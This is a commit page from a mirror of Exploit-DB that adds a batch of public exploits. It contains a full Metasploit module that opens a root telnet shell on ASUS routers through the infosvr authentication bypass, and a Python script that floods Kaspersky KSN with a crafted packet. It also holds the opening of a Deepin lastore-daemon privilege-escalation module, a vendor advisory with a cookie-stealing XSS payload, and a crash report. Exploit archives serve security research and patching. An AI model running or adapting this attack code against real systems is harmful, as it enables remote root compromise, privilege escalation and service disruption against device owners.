bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-04-25

Browse source 
28 changes to exploits/shellcodes

gif2apng 1.9 - '.gif' Stack Buffer Overflow
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 - Memory Corruption (PoC)
Kaspersky KSN for Linux 5.2 - Memory Corruption
Microsoft (Win 10) Internet Explorer 11.371.16299.0 - Denial Of Service
Adobe Flash - Overflow when Playing Sound
Adobe Flash - Overflow in Slab Rendering
Adobe Flash - Info Leak in Image Inflation
Adobe Flash - Out-of-Bounds Write in blur Filtering
Chrome V8 JIT - 'NodeProperties::InferReceiverMaps' Type Confusion
R 3.4.4 - Local Buffer Overflow
Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)
lastore-daemon D-Bus - Privilege Escalation (Metasploit)
Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)
ASUS infosvr - Auth Bypass Command Execution (Metasploit)
UK Cookie Consent - Persistent Cross-Site Scripting
WUZHI CMS 4.1.0 - Cross-Site Request Forgery
Open-AudIT 2.1 - CSV Macro Injection
Monstra CMS 3.0.4 - Arbitrary Folder Deletion
Interspire Email Marketer < 6.1.6 - Remote Admin Authentication Bypass
Ericsson-LG iPECS NMS A.1Ac - Cleartext Credential Disclosure
WordPress Plugin Woo Import Export 1.0 - Arbitrary File Deletion
WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting

Linux/x86 - Bind TCP (1337/TCP) Shell + Null-Free Shellcode (92 bytes)
Linux/x86 - Edit /etc/sudoers with NOPASSWD for ALL Shellcode
Linux/x86 - Reverse TCP (5555/TCP) Shellcode - (73 Bytes)
Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)
Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh Shellcode (74 bytes)
Linux/x86 - execve /bin/sh Shellcode Encoded with ROT-13 + RShift-2 + XOR Encoded (44 bytes)
This commit is contained in:
Offensive Security 2018-04-25 05:01:39 +00:00
parent 082f2d1bd8
commit c249d94cb7
30 changed files with 2358 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

141
exploits/hardware/remote/44524.rb Executable file
View file

@ -0,0 +1,141 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'ASUS infosvr Auth Bypass Command Execution',
'Description' => %q{
This module exploits an authentication bypass vulnerability in the
infosvr service running on UDP port 9999 on various ASUS routers to
execute arbitrary commands as root.
This module launches the BusyBox Telnet daemon on the port specified
in the TelnetPort option to gain an interactive remote shell.
This module was tested successfully on an ASUS RT-N12E with firmware
version 2.0.0.35.
Numerous ASUS models are reportedly affected, but untested.
},
'Author' =>
[
'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
'jduck', # Independent discovery and C exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'References' =>
[
['CVE', '2014-9583'],
['EDB', '35688'],
['URL', 'https://github.com/jduck/asus-cmd']
],
'DisclosureDate' => 'Jan 4 2015',
'Privileged' => true,
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0))
register_options [
Opt::RPORT(9999),
OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
]
register_advanced_options [
# If the session is killed (CTRL+C) rather than exiting cleanly,
# the telnet port remains open, but is unresponsive, and prevents
# re-exploitation until the device is rebooted.
OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
]
end
def telnet_timeout
(datastore['TelnetTimeout'] || 10)
end
def telnet_port
datastore['TelnetPort']
end
def request(cmd)
pkt = ''
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
pkt << "\x0C"
# PacketType [byte] ; NET_PACKET_TYPE_CMD
pkt << "\x15"
# OpCode [word] ; NET_CMD_ID_MANU_CMD
pkt << "\x33\x00"
# Info [dword] ; Comment: "Or Transaction ID"
pkt << Rex::Text.rand_text_alphanumeric(4)
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
pkt << Rex::Text.rand_text_alphanumeric(6)
# Password [byte[32]] ; Not checked at all
pkt << "\x00" * 32
# Command Length + \x00 + Command padded to 512 bytes
pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
end
def exploit
connect_udp
print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
disconnect_udp
vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
Rex.sleep 3
vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
'PeerPort' => telnet_port,
'Context' => { 'Msf' => framework, 'MsfExploit' => self },
'Timeout' => telnet_timeout
if sock.nil?
fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
end
vprint_status "#{rhost} - Trying to establish a telnet session..."
prompt = negotiate_telnet sock
if prompt.nil?
sock.close
fail_with Failure::Unknown, 'Unable to establish a telnet session'
end
print_good "#{rhost} - Telnet session successfully established..."
handler sock
end
def negotiate_telnet(sock)
prompt = '#'
Timeout.timeout(datastore['TelnetBannerTimeout']) do
while true
data = sock.get_once(-1, telnet_timeout)
if !data or data.length == 0
return nil
elsif data.include? prompt
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end

131
exploits/java/webapps/44531.txt Normal file
View file

@ -0,0 +1,131 @@
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
=======================================================================
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."
Source: https://wso2.com/products/carbon/
"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/
Business recommendation:
------------------------
SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).
The payloads are permanently stored in the dashboard and triggered every time the
dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.
2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.
Proof of concept:
-----------------
1) Stored Cross-Site Scripting in WS02 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly
injected:
- Firstname
- Lastname
- Username
- Address
It is suspected, that all user inputs are returned unfiltered in all server responses.
2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
the URL to the following payload: "><img src=x onerror=aler(document.cookie)>
Everytime the carbon middleware application is accessed, the payload is triggered.
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent version
at the time of discovery:
* WSO2IS 5.3.0
Vendor contact timeline:
------------------------
2018-01-25: Contacting vendor through security@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be on 5th of April.
2018-04-23: Public Release
Solution:
---------
Update WSO2 Identity Server to 5.5.0
Workaround:
-----------
No workaround available
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

91
exploits/linux/dos/44519.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: gif2apng 1.9 '.gif' Stack-Buffer Overflow
# Date: 20 April 2018
# Exploit Author: Hamm3r.py
# Vendor Homepage: http://gif2apng.sourceforge.net/
# Version: 1.9
# Tested on: Ubuntu 16.04
# CVE :
gif2apng is vulnerable to a stack based buffer overflow when a malformed
gif is supplied. Following is the stack trace:
$ ./gif2apng fuzz.gif
gif2apng 1.9 using 7ZIP with 15 iterations
Reading 'fuzz.gif'...
=================================================================
==3674==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fffb183bcf1 at pc 0x0000004ebdce bp 0x7fffb1837a90 sp
0x7fffb1837a88
WRITE of size 1 at 0x7fffb183bcf1 thread T0
#0 0x4ebdcd (/home/shyam/FUZZ/gif2apng+0x4ebdcd)
#1 0x4ee926 (/home/shyam/FUZZ/gif2apng+0x4ee926)
#2 0x7f4e5642282f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x4199a8 (/home/shyam/FUZZ/gif2apng+0x4199a8)
Address 0x7fffb183bcf1 is located in stack of thread T0 at offset 16977 in frame
#0 0x4eb23f (/home/shyam/FUZZ/gif2apng+0x4eb23f)
This frame has 6 object(s):
[32, 36) 'size'
[48, 8242) 'prefix'
[8512, 12609) 'suffix'
[12880, 16977) 'str' <== Memory access at offset 16977 overflows
this variable
[17248, 18272) 'data'
[18400, 18401) 'mincodesize'
HINT: this may be a false positive if your program uses some custom
stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow
(/home/shyam/FUZZ/gif2apng+0x4ebdcd)
Shadow bytes around the buggy address:
0x1000762ff740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000762ff790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]f2
0x1000762ff7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7b0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000762ff7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000762ff7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3674==ABORTING
Version of software in use:
./gif2apng
gif2apng 1.9
#This issue is identified by Hamm3r.py, a general purpose fuzzer!
https://github.com/0xshyam/hamm3r.py
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44519.zip

254
exploits/linux/dos/44521.py Executable file
View file

@ -0,0 +1,254 @@
'''
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
# CVE: NotYet
#
# Exploit description:
# Kaspersky KSN v5.2 is prone to a remote memory corruption because it
fails to properly filter the input on the remote subscribers, this
leads to heap segments overwrite
# and it leads to remote code execution.
#
#
# Program description:
# Kaspersky KSN for Linux enables cloud-assisted, multi-layered
security for servers and workstations running the Linux operating
system. It delivers reliable protection with minimal impact on
# performance.
# Product homepage: http://kaspersky.com
#
# Example usage: python kaspersky.py 192.168.1.1 6349
#
# [!] Valgrind output:
#
# =3314== Invalid write of size 4
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd
# ==3314==
# ==3314==
# ==3314== Process terminating with default action of signal 11
(SIGSEGV): dumping core
# ==3314== Access not within mapped region at address 0x0
# ==3314== at 0x24FA74:
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23B740:
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x22FF56:
boost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,
boost::_bi::bind_t<void, boost::_mfi::mf2<void,
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >,
boost::system::error_code const&, unsigned long>,
boost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,
boost::arg<1> (*)(), boost::arg<2> (*)()> >
>::do_complete(boost::asio::detail::task_io_service*,
boost::asio::detail::task_io_service_operation*,
boost::system::error_code const&, unsigned long) (in
/usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x23647C:
boost::asio::detail::task_io_service::run(boost::system::error_code&)
(in /usr/local/ksn/bin/rocksdb-server)
# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)
# ==3314== If you believe this happened as a result of a stack
# ==3314== overflow in your program's main thread (unlikely but
# ==3314== possible), you can try to increase the size of the
# ==3314== main thread stack using the --main-stacksize= flag.
# ==3314== The main thread stack size used in this run was 8388608.
# ==3314==
# ==3314== HEAP SUMMARY:
# ==3314== in use at exit: 769,426 bytes in 7,522 blocks
# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534
bytes allocated
# ==3314==
# ==3314== LEAK SUMMARY:
# ==3314== definitely lost: 8 bytes in 1 blocks
# ==3314== indirectly lost: 0 bytes in 0 blocks
# ==3314== possibly lost: 5,328 bytes in 9 blocks
# ==3314== still reachable: 764,090 bytes in 7,512 blocks
# ==3314== of which reachable via heuristic:
# ==3314== newarray : 8,264 bytes in 4 blocks
# ==3314== suppressed: 0 bytes in 0 blocks
#
# [!] Debugger output:
#
# [----------------------------------registers-----------------------------------]
# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->
0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RBX: 0x0
# RCX: 0x7f7ee2913000 --> 0x0
# RDX: 0xffffffffffdf6bf0
# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# RDI: 0x0
# RBP: 0x7f7ee28f5338 --> 0x81
# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# RIP: 0x7f7ee18b3a74
(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1)
# R8 : 0x0
# R9 : 0x7
# R10: 0x2
# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800
# R12: 0x29b
# R13: 0x0
# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->
0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760
(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)
# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b
# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# 0x7f7ee18b3a6e: xchg ax,ax
# 0x7f7ee18b3a70
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:
push rbx
# 0x7f7ee18b3a71
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:
mov rbx,rdi
# => 0x7f7ee18b3a74
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:
mov DWORD PTR [rdi],0x1
# 0x7f7ee18b3a7a
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:
lea rdi,[rdi+0x10]
# 0x7f7ee18b3a7e
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:
call 0x7f7ee184a8a0
<_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE9_M_assignERKS4_@plt>
# 0x7f7ee18b3a83
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:
mov BYTE PTR [rbx+0x4],0x0
# 0x7f7ee18b3a87
<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:
pop rbx
# [------------------------------------stack-------------------------------------]
# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5
# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815
(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:
mov rdi,QWORD PTR [rsp+0x110])
# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd
# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045
# 0032| 0x7ffe127425e0 --> 0x361
# 0040| 0x7ffe127425e8 --> 0x0
# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->
0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)
# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# gdb-peda$ where
# #0 0x00007f7ee18b3a74 in
RespObject::SetSimpleString(std::__cxx11::basic_string<char,
std::char_traits<char>, std::allocator<char> > const&) ()
# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,
unsigned long, std::function<void (RespObject const&)>) ()
# #2 0x00007f7ee189f741 in
Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,
boost::asio::stream_socket_service<boost::asio::ip::tcp> >
>::HandleRead(boost::system::error_code const&, unsigned long
'''
import binascii
import sys
import socket
import time
def rocksDB(target,port):
try:
while 1:
# Open socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set reuse ON
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind port
s.connect((target, port))
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Connected to:"), target, port
print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " +
"Establishing connection.. ")
packet =
binascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')
# Log the packet in hexa and timestamp
fileLog = target + ".log"
logPacket = open("exploit.log", "w+")
logPacket.write("["+time.strftime('%a %H:%M:%S')+"]"+ " -
Writing to socket: " + binascii.hexlify(bytes(packet))+"\n")
logPacket.close()
# Write bytecodes to socket
print("["+time.strftime('%a %H:%M:%S')+"]"+" - "+"Writing
to socket: ")
s.send(bytes(packet))
# Packet sent:
print(bytes(packet))
try:
data = s.recv(4096)
print("[" + time.strftime('%a %H:%M:%S') + "]" + " -
"+ "Data received: '{msg}'".format(msg=data))
except socket.error, e:
print '[!] Sorry, No data available'
continue
s.close()
except socket.error as error:
print error
print "Sorry, something went wrong!"
def howtouse():
print "Usage: kaspersky.py hostname port"
print "[*] Mandatory arguments:"
print "[-] Specify a hostname / port"
sys.exit(-1)
if __name__ == "__main__":
try:
# Set target
target = sys.argv[1]
port = int(sys.argv[2])
print "[*] Kaspersky KSN 0-Day by Juan Sacco <jsacco@exploitpack.com>"
rocksDB(target, port)
except IndexError:
howtouse()

172
exploits/linux/local/44523.rb Executable file
View file

@ -0,0 +1,172 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'lastore-daemon D-Bus Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Deepin Linux systems
by using lastore-daemon to install a package.
The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any
user in the sudo group to install arbitrary system packages without
providing a password, resulting in code execution as root. By default,
the first user created on the system is a member of the sudo group.
This module has been tested successfully with lastore-daemon version
0.9.53-1 on Deepin Linux 15.5 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
"King's Way", # Discovery and exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Feb 2 2016',
'References' =>
[
[ 'EDB', '39433' ],
[ 'URL', 'https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8' ],
],
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'DefaultTarget' => 0))
register_options([
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
])
end
def base_dir
datastore['WritableDir']
end
def mkdir(path)
vprint_status "Creating '#{path}' directory"
cmd_exec "mkdir -p #{path}"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def command_exists?(cmd)
cmd_exec("command -v #{cmd} && echo true").include? 'true'
end
def dbus_priv?
res = install_package '', ''
(res.include? 'DBus.Error.AccessDenied') ? false : true
end
def install_package(name, path)
dbus_send dest: 'com.deepin.lastore',
type: 'method_call',
path: '/com/deepin/lastore',
interface: 'com.deepin.lastore.Manager.InstallPackage',
contents: "string:'#{name}' string:'#{path}'"
end
def remove_package(name)
dbus_send dest: 'com.deepin.lastore',
type: 'method_call',
path: '/com/deepin/lastore',
interface: 'com.deepin.lastore.Manager.RemovePackage',
contents: "string:' ' string:'#{name}'"
end
def dbus_send(dest:, type:, path:, interface:, contents:)
cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
end
def check
%w(lastore-daemon dpkg-deb dbus-send).each do |cmd|
unless command_exists? cmd
vprint_error "#{cmd} is not installed. Exploitation will fail."
return CheckCode::Safe
end
vprint_good "#{cmd} is installed"
end
unless dbus_priv?
vprint_error 'User is not permitted to install packages. Exploitation will fail.'
return CheckCode::Safe
end
vprint_good 'User is permitted to install packages'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
if check != CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
print_status 'Building package...'
payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
payload_path = "#{base_dir}/#{payload_name}"
pkg_name = rand_text_alphanumeric rand(10..15)
pkg_path = "#{base_dir}/.#{pkg_name}"
mkdir "#{pkg_path}/DEBIAN"
pkg = "Package: #{pkg_name}\n"
pkg << "Version: 0.1\n"
pkg << "Maintainer: #{pkg_name}\n"
pkg << "Architecture: all\n"
pkg << "Description: #{pkg_name}\n"
